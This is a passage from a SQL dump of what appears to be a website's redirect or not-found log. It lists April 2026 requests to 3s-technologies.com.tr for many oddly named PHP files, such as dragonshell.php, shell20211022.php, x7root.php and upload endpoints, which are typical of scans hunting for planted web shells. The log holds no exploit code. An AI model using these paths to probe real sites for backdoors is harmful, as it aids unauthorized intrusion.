00:00:00',301),(63480,'http://www.3s-technologies.com.tr/tr/blqjs.php',NULL,'','',1,0,'2026-04-17 09:32:49','0000-00-00 00:00:00',301),(63481,'http://www.3s-technologies.com.tr/tr/efpu3yhnrinnltvdefault.php',NULL,'','',2,0,'2026-04-17 09:32:52','0000-00-00 00:00:00',301),(63482,'http://www.3s-technologies.com.tr/tr/oircv.php',NULL,'','',1,0,'2026-04-17 09:32:56','0000-00-00 00:00:00',301),(63483,'http://www.3s-technologies.com.tr/tr/blnux.php',NULL,'','',1,0,'2026-04-17 09:32:56','0000-00-00 00:00:00',301),(63484,'http://www.3s-technologies.com.tr/tr/n3yumq6q9xwq8ocdefault.php',NULL,'','',2,0,'2026-04-17 09:32:57','0000-00-00 00:00:00',301),(63485,'http://www.3s-technologies.com.tr/tr/spow_srw.php',NULL,'','',1,0,'2026-04-17 09:32:58','0000-00-00 00:00:00',301),(63486,'http://www.3s-technologies.com.tr/tr/albrt.php',NULL,'','',1,0,'2026-04-17 09:32:58','0000-00-00 00:00:00',301),(63487,'http://www.3s-technologies.com.tr/tr/xxiviclhot.php',NULL,'','',1,0,'2026-04-17 09:32:59','0000-00-00 00:00:00',301),(63488,'http://www.3s-technologies.com.tr/tr/acc.php',NULL,'','',2,0,'2026-04-17 09:33:00','0000-00-00 00:00:00',301),(63489,'http://www.3s-technologies.com.tr/tr/wxeyc.php',NULL,'','',1,0,'2026-04-17 09:33:01','0000-00-00 00:00:00',301),(63490,'http://www.3s-technologies.com.tr/tr/xltt.php',NULL,'','',3,0,'2026-04-17 09:33:01','0000-00-00 00:00:00',301),(63491,'http://www.3s-technologies.com.tr/tr/fyflv.php',NULL,'','',1,0,'2026-04-17 09:33:02','0000-00-00 00:00:00',301),(63492,'http://www.3s-technologies.com.tr/tr/zc-942.php',NULL,'','',1,0,'2026-04-17 09:33:03','0000-00-00 00:00:00',301),(63493,'http://www.3s-technologies.com.tr/tr/sde.php',NULL,'','',1,0,'2026-04-17 09:33:03','0000-00-00 00:00:00',301),(63494,'http://www.3s-technologies.com.tr/tr/wpb.php',NULL,'','',1,0,'2026-04-17 09:33:04','0000-00-00 00:00:00',301),(63495,'http://www.3s-technologies.com.tr/tr/wpxl.php',NULL,'','',2,0,'2026-04-17 09:33:06','0000-00-00 00:00:00',301),(63496,'http://www.3s-technologies.com.tr/tr/s3fiyj2wgcnf0p1default.php',NULL,'','',1,0,'2026-04-17 09:33:06','0000-00-00 00:00:00',301),(63497,'http://www.3s-technologies.com.tr/tr/bfil.php',NULL,'','',2,0,'2026-04-17 09:33:07','0000-00-00 00:00:00',301),(63498,'http://www.3s-technologies.com.tr/tr/dx.php',NULL,'','',5,0,'2026-04-17 09:33:08','0000-00-00 00:00:00',301),(63499,'http://www.3s-technologies.com.tr/tr/p14raewytpdh5hzcsccfdefault.php',NULL,'','',1,0,'2026-04-17 09:33:09','0000-00-00 00:00:00',301),(63500,'http://www.3s-technologies.com.tr/tr/iindv.php',NULL,'','',1,0,'2026-04-17 09:33:10','0000-00-00 00:00:00',301),(63501,'http://www.3s-technologies.com.tr/tr/maintura.php',NULL,'','',1,0,'2026-04-17 09:33:10','0000-00-00 00:00:00',301),(63502,'http://www.3s-technologies.com.tr/tr/iee52ruz0s81ndrdefault.php',NULL,'','',1,0,'2026-04-17 09:33:11','0000-00-00 00:00:00',301),(63503,'http://www.3s-technologies.com.tr/tr/nvwf4svpvqohxdjtbjcdefault.php',NULL,'','',1,0,'2026-04-17 09:33:11','0000-00-00 00:00:00',301),(63504,'http://www.3s-technologies.com.tr/tr/zc-220.php',NULL,'','',1,0,'2026-04-17 09:33:12','0000-00-00 00:00:00',301),(63505,'http://www.3s-technologies.com.tr/tr/r9pbhistk1lifhnjadpcdefault.php',NULL,'','',1,0,'2026-04-17 09:33:13','0000-00-00 00:00:00',301),(63506,'http://www.3s-technologies.com.tr/tr/fone1.php',NULL,'','',3,0,'2026-04-17 09:33:13','0000-00-00 00:00:00',301),(63507,'http://www.3s-technologies.com.tr/tr/xxivildiot.php',NULL,'','',1,0,'2026-04-17 09:33:14','0000-00-00 00:00:00',301),(63508,'http://www.3s-technologies.com.tr/tr/hanyatersenyum.php',NULL,'','',1,0,'2026-04-17 09:33:14','0000-00-00 00:00:00',301),(63509,'http://www.3s-technologies.com.tr/tr/upll22.php',NULL,'','',1,0,'2026-04-17 09:33:16','0000-00-00 00:00:00',301),(63510,'http://www.3s-technologies.com.tr/tr/zc-243.php',NULL,'','',2,0,'2026-04-17 09:33:19','0000-00-00 00:00:00',301),(63511,'http://www.3s-technologies.com.tr/tr/pm90apbv3v5fvgkbguyicdefault.php',NULL,'','',1,0,'2026-04-17 09:33:19','0000-00-00 00:00:00',301),(63512,'http://www.3s-technologies.com.tr/tr/wp/jp.php',NULL,'','',1,0,'2026-04-17 09:33:56','0000-00-00 00:00:00',301),(63513,'http://3s-technologies.com.tr/tr/uazsl.php',NULL,'','',3,0,'2026-04-17 15:46:55','0000-00-00 00:00:00',301),(63514,'http://3s-technologies.com.tr/tr/wp-denmono.php',NULL,'','',3,0,'2026-04-17 15:46:56','0000-00-00 00:00:00',301),(63515,'http://3s-technologies.com.tr/tr/oco.php',NULL,'','',3,0,'2026-04-17 15:47:01','0000-00-00 00:00:00',301),(63516,'http://3s-technologies.com.tr/tr/ogr.php',NULL,'','',3,0,'2026-04-17 15:47:02','0000-00-00 00:00:00',301),(63517,'http://3s-technologies.com.tr/tr/oti.php',NULL,'','',3,0,'2026-04-17 15:47:02','0000-00-00 00:00:00',301),(63518,'http://3s-technologies.com.tr/tr/zc-124.php',NULL,'','',3,0,'2026-04-17 15:47:03','0000-00-00 00:00:00',301),(63519,'http://3s-technologies.com.tr/tr/casp1.php',NULL,'','',10,0,'2026-04-17 15:47:04','0000-00-00 00:00:00',301),(63520,'http://3s-technologies.com.tr/tr/fssxwoyh.php',NULL,'','',3,0,'2026-04-17 15:47:10','0000-00-00 00:00:00',301),(63521,'http://3s-technologies.com.tr/tr/wcvejtpr.php',NULL,'','',3,0,'2026-04-17 15:47:11','0000-00-00 00:00:00',301),(63522,'http://www.3s-technologies.com.tr/tr/mifta.php',NULL,'','',1,0,'2026-04-17 16:26:52','0000-00-00 00:00:00',301),(63523,'http://www.3s-technologies.com.tr/tr/packsin1.php',NULL,'','',2,0,'2026-04-17 16:26:53','0000-00-00 00:00:00',301),(63524,'http://www.3s-technologies.com.tr/tr/son1.php',NULL,'','',1,0,'2026-04-17 16:26:54','0000-00-00 00:00:00',301),(63525,'http://www.3s-technologies.com.tr/tr/ng.php',NULL,'','',1,0,'2026-04-17 16:26:57','0000-00-00 00:00:00',301),(63526,'http://www.3s-technologies.com.tr/tr/tiny2.php',NULL,'','',1,0,'2026-04-17 16:26:57','0000-00-00 00:00:00',301),(63527,'http://www.3s-technologies.com.tr/tr/state.php',NULL,'','',1,0,'2026-04-17 16:26:58','0000-00-00 00:00:00',301),(63528,'http://www.3s-technologies.com.tr/tr/wps.php',NULL,'','',1,0,'2026-04-17 16:27:00','0000-00-00 00:00:00',301),(63529,'http://www.3s-technologies.com.tr/tr/ayk.php',NULL,'','',1,0,'2026-04-17 16:27:00','0000-00-00 00:00:00',301),(63530,'http://www.3s-technologies.com.tr/tr/wgift1.php',NULL,'','',1,0,'2026-04-17 16:27:01','0000-00-00 00:00:00',301),(63531,'http://www.3s-technologies.com.tr/tr/tiny',NULL,'','',1,0,'2026-04-17 16:27:05','0000-00-00 00:00:00',301),(63532,'http://www.3s-technologies.com.tr/tr/class-wp-image.php',NULL,'','',1,0,'2026-04-17 16:27:07','0000-00-00 00:00:00',301),(63533,'http://www.3s-technologies.com.tr/tr/roksad1.php',NULL,'','',1,0,'2026-04-17 16:27:13','0000-00-00 00:00:00',301),(63534,'http://www.3s-technologies.com.tr/tr/bdktk.php',NULL,'','',1,0,'2026-04-17 16:27:21','0000-00-00 00:00:00',301),(63535,'http://www.3s-technologies.com.tr/tr/r2.php',NULL,'','',1,0,'2026-04-17 16:27:24','0000-00-00 00:00:00',301),(63536,'http://www.3s-technologies.com.tr/tr/samll.php',NULL,'','',1,0,'2026-04-17 16:27:26','0000-00-00 00:00:00',301),(63537,'http://www.3s-technologies.com.tr/tr/zogy1.php',NULL,'','',1,0,'2026-04-17 16:27:27','0000-00-00 00:00:00',301),(63538,'http://www.3s-technologies.com.tr/tr/aios-bootstrap.php',NULL,'','',1,0,'2026-04-17 16:27:29','0000-00-00 00:00:00',301),(63539,'http://www.3s-technologies.com.tr/tr/gz.php',NULL,'','',1,0,'2026-04-17 16:27:31','0000-00-00 00:00:00',301),(63540,'http://www.3s-technologies.com.tr/tr/gelio1.php',NULL,'','',1,0,'2026-04-17 16:27:32','0000-00-00 00:00:00',301),(63541,'http://www.3s-technologies.com.tr/tr/areak1.php',NULL,'','',1,0,'2026-04-17 16:27:32','0000-00-00 00:00:00',301),(63542,'http://www.3s-technologies.com.tr/tr/ga.php',NULL,'','',1,0,'2026-04-17 16:27:34','0000-00-00 00:00:00',301),(63543,'http://www.3s-technologies.com.tr/tr/1100.php',NULL,'','',1,0,'2026-04-17 16:27:35','0000-00-00 00:00:00',301),(63544,'http://www.3s-technologies.com.tr/tr/wp-kz.php',NULL,'','',1,0,'2026-04-17 16:27:38','0000-00-00 00:00:00',301),(63545,'http://www.3s-technologies.com.tr/tr/wp-lo.php',NULL,'','',1,0,'2026-04-17 16:27:38','0000-00-00 00:00:00',301),(63546,'http://www.3s-technologies.com.tr/tr/ipv6.php',NULL,'','',1,0,'2026-04-17 16:27:39','0000-00-00 00:00:00',301),(63547,'http://www.3s-technologies.com.tr/tr/file-gertdxz.php',NULL,'','',1,0,'2026-04-17 16:27:40','0000-00-00 00:00:00',301),(63548,'http://www.3s-technologies.com.tr/tr/xper1.php',NULL,'','',2,0,'2026-04-17 16:27:40','0000-00-00 00:00:00',301),(63549,'http://www.3s-technologies.com.tr/tr/yuzuru1.php',NULL,'','',2,0,'2026-04-17 16:27:41','0000-00-00 00:00:00',301),(63550,'http://www.3s-technologies.com.tr/tr/wglum1.php',NULL,'','',1,0,'2026-04-17 16:27:41','0000-00-00 00:00:00',301),(63551,'http://www.3s-technologies.com.tr/tr/saorix1.php',NULL,'','',2,0,'2026-04-17 16:27:42','0000-00-00 00:00:00',301),(63552,'http://www.3s-technologies.com.tr/tr/xper.php',NULL,'','',1,0,'2026-04-17 16:27:42','0000-00-00 00:00:00',301),(63553,'http://www.3s-technologies.com.tr/tr/wxpass.php',NULL,'','',1,0,'2026-04-17 16:27:43','0000-00-00 00:00:00',301),(63554,'http://www.3s-technologies.com.tr/tr/wp-block.php',NULL,'','',4,0,'2026-04-17 16:27:49','0000-00-00 00:00:00',301),(63555,'http://www.3s-technologies.com.tr/tr/wp-includes/wincust.php',NULL,'','',1,0,'2026-04-17 16:27:50','0000-00-00 00:00:00',301),(63556,'http://www.3s-technologies.com.tr/tr/xynz.php',NULL,'','',1,0,'2026-04-17 16:27:55','0000-00-00 00:00:00',301),(63557,'http://www.3s-technologies.com.tr/tr/wp-01ul.php',NULL,'','',1,0,'2026-04-17 16:27:56','0000-00-00 00:00:00',301),(63558,'http://www.3s-technologies.com.tr/tr/e7.php',NULL,'','',1,0,'2026-04-17 16:27:57','0000-00-00 00:00:00',301),(63559,'http://www.3s-technologies.com.tr/tr/e3.php',NULL,'','',1,0,'2026-04-17 16:27:59','0000-00-00 00:00:00',301),(63560,'http://www.3s-technologies.com.tr/tr/aevly.php',NULL,'','',2,0,'2026-04-17 16:27:59','0000-00-00 00:00:00',301),(63561,'http://www.3s-technologies.com.tr/tr/wp-class.php',NULL,'','',1,0,'2026-04-17 16:28:00','0000-00-00 00:00:00',301),(63562,'http://www.3s-technologies.com.tr/tr/curl.php',NULL,'','',1,0,'2026-04-17 16:28:04','0000-00-00 00:00:00',301),(63563,'http://www.3s-technologies.com.tr/tr/sallu.php',NULL,'','',1,0,'2026-04-17 16:28:05','0000-00-00 00:00:00',301),(63564,'http://www.3s-technologies.com.tr/tr/goods_260325043000.php',NULL,'','',1,0,'2026-04-17 16:28:07','0000-00-00 00:00:00',301),(63565,'http://www.3s-technologies.com.tr/tr/goods_260401065719.php',NULL,'','',1,0,'2026-04-17 16:28:07','0000-00-00 00:00:00',301),(63566,'http://mail.3s-technologies.com.tr/tr/shadow-bot.php',NULL,'','',1,0,'2026-04-17 20:11:32','0000-00-00 00:00:00',301),(63567,'http://mail.3s-technologies.com.tr/tr/str_replace.php',NULL,'','',1,0,'2026-04-17 20:11:32','0000-00-00 00:00:00',301),(63568,'http://mail.3s-technologies.com.tr/tr/maint.php',NULL,'','',1,0,'2026-04-17 20:11:33','0000-00-00 00:00:00',301),(63569,'http://mail.3s-technologies.com.tr/tr/nosasq.php',NULL,'','',1,0,'2026-04-17 20:11:34','0000-00-00 00:00:00',301),(63570,'http://mail.3s-technologies.com.tr/tr/class-wp-oembed-beta.php',NULL,'','',1,0,'2026-04-17 20:11:34','0000-00-00 00:00:00',301),(63571,'http://mail.3s-technologies.com.tr/tr/block-template-utils.php',NULL,'','',1,0,'2026-04-17 20:11:36','0000-00-00 00:00:00',301),(63572,'http://mail.3s-technologies.com.tr/tr/date-object.php',NULL,'','',1,0,'2026-04-17 20:11:38','0000-00-00 00:00:00',301),(63573,'http://mail.3s-technologies.com.tr/tr/w-1.php',NULL,'','',1,0,'2026-04-17 20:11:38','0000-00-00 00:00:00',301),(63574,'http://mail.3s-technologies.com.tr/tr/bbh.php',NULL,'','',1,0,'2026-04-17 20:11:40','0000-00-00 00:00:00',301),(63575,'http://mail.3s-technologies.com.tr/tr/class-wp-pagebuilders-bdsjlk.php',NULL,'','',1,0,'2026-04-17 20:11:41','0000-00-00 00:00:00',301),(63576,'http://mail.3s-technologies.com.tr/tr/iiiihjwn.php',NULL,'','',1,0,'2026-04-17 20:11:41','0000-00-00 00:00:00',301),(63577,'http://mail.3s-technologies.com.tr/tr/ru_ru_lite.mo.php',NULL,'','',1,0,'2026-04-17 20:11:42','0000-00-00 00:00:00',301),(63578,'http://mail.3s-technologies.com.tr/tr/wpputty.php',NULL,'','',1,0,'2026-04-17 20:11:42','0000-00-00 00:00:00',301),(63579,'http://mail.3s-technologies.com.tr/tr/dodo.php',NULL,'','',1,0,'2026-04-17 20:11:43','0000-00-00 00:00:00',301),(63580,'http://mail.3s-technologies.com.tr/tr/wp-post-data.php',NULL,'','',3,0,'2026-04-17 20:11:43','0000-00-00 00:00:00',301),(63581,'http://mail.3s-technologies.com.tr/tr/class-wp-recovery-mode-key-service-add.php',NULL,'','',1,0,'2026-04-17 20:11:44','0000-00-00 00:00:00',301),(63582,'http://www.3s-technologies.com.tr/tr/wp-temp.php',NULL,'','',2,0,'2026-04-18 15:45:01','0000-00-00 00:00:00',301),(63583,'http://www.3s-technologies.com.tr/tr/archive.php',NULL,'','',3,0,'2026-04-18 15:45:39','0000-00-00 00:00:00',301),(63584,'http://www.3s-technologies.com.tr/tr/wp-includes/class-wp-http-client.php',NULL,'','',2,0,'2026-04-18 15:46:29','0000-00-00 00:00:00',301),(63585,'http://www.3s-technologies.com.tr/tr/wp-includes/configuration.php',NULL,'','',2,0,'2026-04-18 15:46:30','0000-00-00 00:00:00',301),(63586,'http://www.3s-technologies.com.tr/tr/option.php',NULL,'','',2,0,'2026-04-18 15:46:35','0000-00-00 00:00:00',301),(63587,'http://www.3s-technologies.com.tr/tr/albin.php',NULL,'','',4,0,'2026-04-18 15:46:41','0000-00-00 00:00:00',301),(63588,'http://www.3s-technologies.com.tr/tr/dragonshell.php',NULL,'','',3,0,'2026-04-18 15:46:45','0000-00-00 00:00:00',301),(63589,'http://www.3s-technologies.com.tr/tr/unsubscribe.php',NULL,'','',1,0,'2026-04-18 15:47:07','0000-00-00 00:00:00',301),(63590,'http://www.3s-technologies.com.tr/tr/hh.php',NULL,'','',1,0,'2026-04-18 15:47:28','0000-00-00 00:00:00',301),(63591,'http://www.3s-technologies.com.tr/tr/rt.php',NULL,'','',1,0,'2026-04-18 15:47:29','0000-00-00 00:00:00',301),(63592,'http://www.3s-technologies.com.tr/tr/pages.php',NULL,'','',1,0,'2026-04-18 15:47:32','0000-00-00 00:00:00',301),(63593,'http://www.3s-technologies.com.tr/tr/wp-admin/post.php',NULL,'','',1,0,'2026-04-18 15:47:33','0000-00-00 00:00:00',301),(63594,'http://www.3s-technologies.com.tr/tr/t/rfi.php',NULL,'','',2,0,'2026-04-18 15:49:02','0000-00-00 00:00:00',301),(63595,'http://3s-technologies.com.tr/tr/wp-post-data.php',NULL,'','',4,0,'2026-04-18 18:40:44','0000-00-00 00:00:00',301),(63596,'http://3s-technologies.com.tr/tr/subs/upload/upload.php',NULL,'','',1,0,'2026-04-18 18:40:47','0000-00-00 00:00:00',301),(63597,'http://mail.3s-technologies.com.tr/tr/file-kikikoko.php',NULL,'','',4,0,'2026-04-18 19:58:45','0000-00-00 00:00:00',301),(63598,'http://mail.3s-technologies.com.tr/tr/wp-kikikoko.php',NULL,'','',6,0,'2026-04-18 19:58:46','0000-00-00 00:00:00',301),(63599,'http://mail.3s-technologies.com.tr/tr/ganja.php',NULL,'','',6,0,'2026-04-18 19:58:46','0000-00-00 00:00:00',301),(63600,'http://mail.3s-technologies.com.tr/tr/sad821.php',NULL,'','',4,0,'2026-04-18 19:58:46','0000-00-00 00:00:00',301),(63601,'http://mail.3s-technologies.com.tr/tr/sad8210.php',NULL,'','',4,0,'2026-04-18 19:58:47','0000-00-00 00:00:00',301),(63602,'http://mail.3s-technologies.com.tr/tr/x7root.php',NULL,'','',1,0,'2026-04-19 03:21:48','0000-00-00 00:00:00',301),(63603,'http://mail.3s-technologies.com.tr/tr/lib/filelib.php',NULL,'','',1,0,'2026-04-19 03:24:03','0000-00-00 00:00:00',301),(63604,'http://mail.3s-technologies.com.tr/tr/pluginfile.php',NULL,'','',1,0,'2026-04-19 03:24:03','0000-00-00 00:00:00',301),(63605,'http://mail.3s-technologies.com.tr/tr/lib/setup.php',NULL,'','',1,0,'2026-04-19 03:24:04','0000-00-00 00:00:00',301),(63606,'http://mail.3s-technologies.com.tr/tr/version.php',NULL,'','',1,0,'2026-04-19 03:24:05','0000-00-00 00:00:00',301),(63607,'http://mail.3s-technologies.com.tr/tr/auth/oauth2/lib.php',NULL,'','',1,0,'2026-04-19 03:24:06','0000-00-00 00:00:00',301),(63608,'http://mail.3s-technologies.com.tr/tr/cgiag/mycgia/lib/weblib.php',NULL,'','',1,0,'2026-04-19 03:24:07','0000-00-00 00:00:00',301),(63609,'http://mail.3s-technologies.com.tr/tr/admin.php.',NULL,'','',1,0,'2026-04-19 03:24:09','0000-00-00 00:00:00',301),(63610,'http://mail.3s-technologies.com.tr/tr/well-known',NULL,'','',1,0,'2026-04-19 03:24:28','0000-00-00 00:00:00',301),(63611,'http://3s-technologies.com.tr/tr/wp-includes/blocks/details',NULL,'','',14,0,'2026-04-19 04:15:30','0000-00-00 00:00:00',301),(63612,'http://3s-technologies.com.tr/tr/wp-includes/blocks/audio',NULL,'','',14,0,'2026-04-19 04:15:31','0000-00-00 00:00:00',301),(63613,'http://3s-technologies.com.tr/tr/m57.php',NULL,'','',2,0,'2026-04-19 04:15:32','0000-00-00 00:00:00',301),(63614,'http://3s-technologies.com.tr/tr/wp-m57.php',NULL,'','',2,0,'2026-04-19 04:15:33','0000-00-00 00:00:00',301),(63615,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive/assets',NULL,'','',7,0,'2026-04-19 04:15:40','0000-00-00 00:00:00',301),(63616,'http://3s-technologies.com.tr/tr/wp-includes/blocks/buttons',NULL,'','',14,0,'2026-04-19 04:15:40','0000-00-00 00:00:00',301),(63617,'http://3s-technologies.com.tr/tr/xmu.php',NULL,'','',16,0,'2026-04-19 04:15:43','0000-00-00 00:00:00',301),(63618,'http://3s-technologies.com.tr/tr/ref.php',NULL,'','',5,0,'2026-04-19 04:15:44','0000-00-00 00:00:00',301),(63619,'http://3s-technologies.com.tr/tr/ktfow.php',NULL,'','',7,0,'2026-04-19 04:15:46','0000-00-00 00:00:00',301),(63620,'http://3s-technologies.com.tr/tr/xmini.php',NULL,'','',3,0,'2026-04-19 04:15:47','0000-00-00 00:00:00',301),(63621,'http://3s-technologies.com.tr/tr/oh.php',NULL,'','',1,0,'2026-04-19 21:43:08','0000-00-00 00:00:00',301),(63622,'http://3s-technologies.com.tr/tr/lim.php',NULL,'','',1,0,'2026-04-19 21:43:09','0000-00-00 00:00:00',301),(63623,'http://3s-technologies.com.tr/tr/wp-content/hex.php',NULL,'','',1,0,'2026-04-19 21:43:10','0000-00-00 00:00:00',301),(63624,'http://3s-technologies.com.tr/tr/gezdjgie.php',NULL,'','',1,0,'2026-04-19 21:43:11','0000-00-00 00:00:00',301),(63625,'http://3s-technologies.com.tr/tr/ihodcrk.php',NULL,'','',1,0,'2026-04-19 21:43:16','0000-00-00 00:00:00',301),(63626,'http://3s-technologies.com.tr/tr/owrlfoa.php',NULL,'','',1,0,'2026-04-19 21:43:17','0000-00-00 00:00:00',301),(63627,'http://3s-technologies.com.tr/tr/afggdg.php',NULL,'','',1,0,'2026-04-19 21:43:21','0000-00-00 00:00:00',301),(63628,'https://3s-technologies.com.tr/en/file-manager/initialize',NULL,'','',6,0,'2026-04-20 00:17:07','0000-00-00 00:00:00',301),(63629,'http://mail.3s-technologies.com.tr/tr/shell20211022.php',NULL,'','',1,0,'2026-04-20 02:06:31','0000-00-00 00:00:00',301),(63630,'http://mail.3s-technologies.com.tr/tr/subs/upload/upload.php',NULL,'','',1,0,'2026-04-20 02:06:35','0000-00-00 00:00:00',301),(63631,'http://3s-technologies.com.tr/tr/public/plugins/ueditor/dialogs/attachment/filetypeimages/icon_psd.gif',NULL,'http://3s-technologies.com.tr','',1,0,'2026-04-20 04:36:02','0000-00-00 00:00:00',301),(63632,'http://3s-technologies.com.tr/en/plugins/system/nrframework/nrframework.xml',NULL,'','',3,0,'2026-04-20 09:02:55','0000-00-00 00:00:00',301),(63633,'http://3s-technologies.com.tr/en/plugins/system/nrframework/nrframework.php',NULL,'http://3s-technologies.com.tr/en/plugins/system/nrframework/nrframework.xml','',3,0,'2026-04-20 09:03:23','0000-00-00 00:00:00',301),(63634,'http://3s-technologies.com.tr/tr/plupload/examples/upload.php',NULL,'','',2,0,'2026-04-20 15:36:58','0000-00-00 00:00:00',301),(63635,'http://3s-technologies.com.tr/tr/nrmkg.php',NULL,'','',1,0,'2026-04-20 16:22:37','0000-00-00 00:00:00',301),(63636,'http://3s-technologies.com.tr/tr/mwwqu.php',NULL,'','',1,0,'2026-04-20 16:22:37','0000-00-00 00:00:00',301),(63637,'http://3s-technologies.com.tr/tr/zrlrv.php',NULL,'','',1,0,'2026-04-20 16:22:38','0000-00-00 00:00:00',301),(63638,'http://3s-technologies.com.tr/tr/yqipc.php',NULL,'','',1,0,'2026-04-20 16:22:39','0000-00-00 00:00:00',301),(63639,'http://3s-technologies.com.tr/tr/yfwka.php',NULL,'','',1,0,'2026-04-20 16:22:39','0000-00-00 00:00:00',301),(63640,'http://3s-technologies.com.tr/tr/wqbtn.php',NULL,'','',1,0,'2026-04-20 16:22:40','0000-00-00 00:00:00',301),(63641,'http://3s-technologies.com.tr/tr/wp_6adxegno.php',NULL,'','',1,0,'2026-04-20 16:22:40','0000-00-00 00:00:00',301),(63642,'http://mail.3s-technologies.com.tr/tr/rip',NULL,'','',1,0,'2026-04-20 16:33:23','0000-00-00 00:00:00',301),(63643,'http://mail.3s-technologies.com.tr/tr/plugin-install.php',NULL,'','',2,0,'2026-04-20 18:55:04','0000-00-00 00:00:00',301),(63644,'http://mail.3s-technologies.com.tr/tr/tymn.php',NULL,'','',2,0,'2026-04-20 18:55:25','0000-00-00 00:00:00',301),(63645,'http://mail.3s-technologies.com.tr/tr/wp-class-atom.php',NULL,'','',2,0,'2026-04-20 18:55:29','0000-00-00 00:00:00',301),(63646,'http://mail.3s-technologies.com.tr/tr/jk.php',NULL,'','',2,0,'2026-04-20 18:55:31','0000-00-00 00:00:00',301),(63647,'http://mail.3s-technologies.com.tr/tr/adoms.php',NULL,'','',2,0,'2026-04-20 18:55:36','0000-00-00 00:00:00',301),(63648,'http://mail.3s-technologies.com.tr/tr/gcqoa.php',NULL,'','',2,0,'2026-04-20 18:55:50','0000-00-00 00:00:00',301),(63649,'http://mail.3s-technologies.com.tr/tr/wp-class-api.php',NULL,'','',2,0,'2026-04-20 18:55:52','0000-00-00 00:00:00',301),(63650,'http://www.3s-technologies.com.tr/tr/rip',NULL,'','',1,0,'2026-04-20 19:14:58','0000-00-00 00:00:00',301),(63651,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/twenty/login.php',NULL,'','',1,0,'2026-04-20 19:15:08','0000-00-00 00:00:00',301),(63652,'http://www.3s-technologies.com.tr/tr/.dj/index.php',NULL,'','',1,0,'2026-04-20 19:15:12','0000-00-00 00:00:00',301),(63653,'http://www.3s-technologies.com.tr/tr/php8.php',NULL,'','',1,0,'2026-04-20 19:15:14','0000-00-00 00:00:00',301),(63654,'http://www.3s-technologies.com.tr/tr/load.php',NULL,'','',1,0,'2026-04-20 19:15:19','0000-00-00 00:00:00',301),(63655,'http://www.3s-technologies.com.tr/tr/classsmtps.php',NULL,'','',1,0,'2026-04-20 19:15:25','0000-00-00 00:00:00',301),(63656,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/beteng88/ws83.php',NULL,'','',1,0,'2026-04-20 19:15:33','0000-00-00 00:00:00',301),(63657,'http://www.3s-technologies.com.tr/tr/onclickfuns.php',NULL,'','',1,0,'2026-04-20 19:15:57','0000-00-00 00:00:00',301),(63658,'http://www.3s-technologies.com.tr/tr/.info.php',NULL,'','',1,0,'2026-04-20 19:16:01','0000-00-00 00:00:00',301),(63659,'http://www.3s-technologies.com.tr/tr/profile.php',NULL,'','',2,0,'2026-04-20 19:16:36','0000-00-00 00:00:00',301),(63660,'http://3s-technologies.com.tr/tr/wp-kikikoko.php',NULL,'','',11,0,'2026-04-20 20:22:38','0000-00-00 00:00:00',301),(63661,'http://3s-technologies.com.tr/tr/tymn.php',NULL,'','',2,0,'2026-04-20 20:22:52','0000-00-00 00:00:00',301),(63662,'http://3s-technologies.com.tr/tr/wp-class-atom.php',NULL,'','',2,0,'2026-04-20 20:22:55','0000-00-00 00:00:00',301),(63663,'http://3s-technologies.com.tr/tr/jk.php',NULL,'','',2,0,'2026-04-20 20:22:58','0000-00-00 00:00:00',301),(63664,'http://3s-technologies.com.tr/tr/adoms.php',NULL,'','',2,0,'2026-04-20 20:23:03','0000-00-00 00:00:00',301),(63665,'http://3s-technologies.com.tr/tr/plugin-editor.php',NULL,'','',2,0,'2026-04-20 20:23:03','0000-00-00 00:00:00',301),(63666,'http://3s-technologies.com.tr/tr/gcqoa.php',NULL,'','',2,0,'2026-04-20 20:23:17','0000-00-00 00:00:00',301),(63667,'http://3s-technologies.com.tr/tr/wp-class-api.php',NULL,'','',2,0,'2026-04-20 20:23:19','0000-00-00 00:00:00',301),(63668,'http://mail.3s-technologies.com.tr/tr/public/olezrvqmjjpfsucdefault.php',NULL,'','',2,0,'2026-04-21 08:46:50','0000-00-00 00:00:00',301),(63669,'http://mail.3s-technologies.com.tr/tr/casp1.php',NULL,'','',8,0,'2026-04-21 08:47:21','0000-00-00 00:00:00',301),(63670,'http://mail.3s-technologies.com.tr/tr/prosellers8.php',NULL,'','',2,0,'2026-04-21 08:47:28','0000-00-00 00:00:00',301),(63671,'http://mail.3s-technologies.com.tr/tr/fsjzs.php',NULL,'','',2,0,'2026-04-21 08:47:30','0000-00-00 00:00:00',301),(63672,'http://3s-technologies.com.tr/tr/xminie.php',NULL,'','',9,0,'2026-04-21 09:47:36','0000-00-00 00:00:00',301),(63673,'http://3s-technologies.com.tr/tr/x=34.php',NULL,'','',10,0,'2026-04-21 09:47:38','0000-00-00 00:00:00',301),(63674,'http://3s-technologies.com.tr/tr/insta.php',NULL,'','',15,0,'2026-04-21 09:47:38','0000-00-00 00:00:00',301),(63675,'http://3s-technologies.com.tr/tr/file-kikikoko.php',NULL,'','',9,0,'2026-04-21 09:47:44','0000-00-00 00:00:00',301),(63676,'http://3s-technologies.com.tr/tr/ganja.php',NULL,'','',12,0,'2026-04-21 09:47:45','0000-00-00 00:00:00',301),(63677,'http://3s-technologies.com.tr/tr/sad821.php',NULL,'','',9,0,'2026-04-21 09:47:46','0000-00-00 00:00:00',301),(63678,'http://3s-technologies.com.tr/tr/sad8210.php',NULL,'','',9,0,'2026-04-21 09:47:46','0000-00-00 00:00:00',301),(63679,'http://3s-technologies.com.tr/tr/public/olezrvqmjjpfsucdefault.php',NULL,'','',2,0,'2026-04-21 10:20:32','0000-00-00 00:00:00',301),(63680,'http://www.3s-technologies.com.tr/tr/file6.php',NULL,'','',1,0,'2026-04-21 19:56:22','0000-00-00 00:00:00',301),(63681,'http://www.3s-technologies.com.tr/tr/sl.php',NULL,'','',1,0,'2026-04-21 19:56:23','0000-00-00 00:00:00',301),(63682,'http://www.3s-technologies.com.tr/tr/flox.php',NULL,'','',1,0,'2026-04-21 19:56:23','0000-00-00 00:00:00',301),(63683,'http://www.3s-technologies.com.tr/tr/mff.php',NULL,'','',1,0,'2026-04-21 19:56:24','0000-00-00 00:00:00',301),(63684,'http://www.3s-technologies.com.tr/tr/filemanger2.php',NULL,'','',1,0,'2026-04-21 19:56:26','0000-00-00 00:00:00',301),(63685,'http://www.3s-technologies.com.tr/tr/wp-vn1.php',NULL,'','',1,0,'2026-04-21 19:56:27','0000-00-00 00:00:00',301),(63686,'http://www.3s-technologies.com.tr/tr/ewp.php',NULL,'','',1,0,'2026-04-21 19:56:28','0000-00-00 